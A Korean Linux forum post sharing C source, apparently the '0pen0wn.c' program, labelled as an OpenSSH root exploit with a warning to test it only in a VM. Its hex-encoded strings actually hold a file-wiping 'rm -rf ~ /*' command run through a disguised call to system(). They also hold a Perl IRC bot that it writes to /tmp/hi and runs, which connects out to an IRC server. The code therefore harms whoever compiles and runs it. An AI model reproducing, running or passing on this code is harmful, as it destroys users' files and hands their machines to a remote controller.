Latest Posts Recent Comments 문의사항 신고하기 이용안내 이벤트 포인트 리스트 공지사항 관리자문의

공지사항

고정공지

(자유게시판에서 질문 금지) 질문하신 유저는 통보 없이 "계정정리" 될수 있습니다.

놀이터 일간 추천 베스트

놀이터 일간 조회 베스트

리눅스 정신나가게하는 소스코드입니다.

본체 하드 리눅스에서 실행시키면 안됍니다.

VMware에서 실험해보세요. (하기 전에 SnapShot 해두고 해주세요!)

 

 

/* 0pen0wn.c by anti-sec group

* ---------------------------

* OpenSSH

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <stdarg.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <unistd.h>

#include <netdb.h>

#define VALID_RANGE 0xb44ffe00

#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =

"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"

"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

 

char shellcode[] =

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"

"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"

"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"

"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"

"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"

"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"

"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"

"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"

"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"

"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"

"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"

"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"

"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"

"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"

"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"

"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"

"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"

"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"

"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"

"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"

"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"

"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"

"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"

"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"

"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"

"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"

"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"

"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"

"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";

 

char fbsd_shellcode[] =

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"

"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"

"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"

"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"

"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"

"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"

"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"

"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"

"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"

"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"

"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"

"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"

"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"

"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"

"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"

"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"

"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"

"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"

"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"

"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"

"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"

"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"

"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"

"\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"

"\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"

"\x2f\x74\x6d\x70\x2f\x68\x69\x0a";

#define SIZE 0xffffff

#define OFFSET 131

#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){

printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");

printf(" Usage: %s -h <host> -p port\n",arg);

printf(" Options:\n");

printf(" \t-h ip/host of target\n");

printf(" \t-p port\n");

printf(" \t-d username\n");

printf(" \t-B memory_limit 8/16/64\n\n\n");

}

 

#define FD 0x080518fc

#define BD 0x08082000

int main(int argc, char **argv){

FILE *jmpinst;

char h[500],buffer[1024];

fremote(jmpcode);

char *payload, *ptr;

int port=23, limit=8, target=0, sock;

struct hostent *host;

struct sockaddr_in addr;

if (geteuid()) {

puts("need root for raw socket, etc...");

return 1;

}

if(argc < 3){

usage(argv[0]);

return 1;

}

printf("\n [+] 0wn0wn - by anti-sec group\n");

if (!inet_aton(h, &addr.sin_addr)){

host = gethostbyname(h);

if (!host){

printf(" [-] Resolving failed\n");

return 1;

}

addr.sin_addr = *(struct in_addr*)host->h_addr;

}

sock = socket(PF_INET, SOCK_STREAM, 0);

addr.sin_port = htons(port);

addr.sin_family = AF_INET;

if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){

printf(" [-] Connecting failed\n");

return 1;

}

payload = malloc(limit * 10000);

ptr = payload+8;

memcpy(ptr,jmpcode,strlen(jmpcode));

jmpinst=fopen(shellcode+793,"w+");

if(jmpinst){

fseek(jmpinst,0,SEEK_SET);

fprintf(jmpinst,"%s",shellcode);

fclose(jmpinst);

}

ptr += strlen(jmpcode);

if(target != 5 && target != 6){

memcpy(ptr,shellcode,strlen(shellcode));

ptr += strlen(shellcode);

memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));

}

else{

memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));

ptr += strlen(fbsd_shellcode);

memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));

}

send(sock,buffer,strlen(buffer),0);

send(sock,ptr,3750,0);

close(sock);

if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {

printf(" [-] connecting failed\n");

}

payload[sizeof(payload)-1] = '\0';

payload[sizeof(payload)-2] = '\0';

send(sock,buffer,strlen(buffer),0);

send(sock,payload,strlen(payload),0);

close(sock);

free(payload);

addr.sin_port = htons(6666);

if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {

/* v--- our cool bar that says: "r0000000t!!!" */

printf("\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");

fremote("PS1='sh-3.2#' /bin/sh");

}

else

printf(" [-] failed to exploit target :-(\n");

close(sock);

return 0;

}

자료만 받아갈줄 아는 회원님들께, 개발자님들에게 최소한의 경우는 우리가 피드백으로 보답하는 겁니다

문제가 있던 없던 그동안 고생하신 것을 생각하여 피드백 작성을 부탁 드립니다
­

의견쓰기::  상업광고, 인신공격,비방, 욕설, 아주강한음담패설등의 코멘트는 예고없이 삭제될수 있습니다. 회원정리 게시판

profile

kungms

2019.03.28 20:39
가입일: 2016:04.03
총 게시물수: 34
총 댓글수: 497

이 코드는 왜 리눅스를 정신 나가게 하는 건가요??

profile

끄앙

2019.05.06 00:49
가입일: 2018:09.12
총 게시물수: 0
총 댓글수: 17

설명 좀..

List of Articles
번호 제목 글쓴이 날짜sort 조회 수
38 우분투 18.04 자바 8 설치 file + 2 난나니 10-12 604
37 국산 OS (Tmax OS) + 13 구영탄 08-21 1417
36 Ubuntu(리눅스)와 Windows와 멀티부팅 환경에서 시간이 맞지 않는 현상 해결하기 + 4 판치 07-15 568
35 조린 ZorinOS Linux_15Ultimatex64 설치기 file + 7 바다3 06-22 729
34 MX 리눅스 18.3 설치 및 1일 사용기 file + 8 kungms 06-08 1063
33 한국의 토종 OS 를 목표로 하는 No1.Linux 배포판입니다 file + 6 치즈맨 06-05 943
32 윈도7 서비스 종료와 국산 OS??? + 7 판치 05-26 601
31 Ubuntu 18.04의 독(Dock)을 Mac OS처럼 화면 아래에 보이게 하기 + 1 집그리는청년 05-22 461
30 zip 압축 파일 및 텍스트 파일의 한글 깨짐 해결 방법 집그리는청년 05-22 468
29 우분투 grub에 배경화면을 넣어보자! 집그리는청년 05-22 351
28 GRUB의 대기 시간, 기본 부팅 순서 바꾸기 + 1 집그리는청년 05-22 504
27 Kubuntu 18.04 한글화 file + 1 ckk2580 05-20 401
26 하모니카 미디어 에디션 - HamoniKR-ME 64bit 1.3 file + 3 ckk2580 05-20 475
» 리눅스 정신나가게하는 소스코드입니다. + 2 누군가 03-25 715
24 리눅스 권한 상승 가능한 Dirty Sock 취약점 발견 file 엔냐 02-16 413
23 하모니카 커뮤니티 배포판 리눅스민트 19.1 Moordev Tessa MATE 64bit + 7 ckk2580 02-15 691
22 [정식버전] No1.Linux-2018.12.25-KDE-PLASMA5-SE.UP5.x86_64 + 5 ckk2580 02-15 762
21 저사양 유저 또는 군건더기 없는 운영체계를 원하는 분을 위한 루분투 file + 11 System32 02-04 994
20 hit 리눅스 배포판 순위 사이트 + 14 판치 01-13 2857
19 우분투에서 한글 입력기 비교 사용기 (ibus, fcitx, uim) + 2 kungms 12-31 873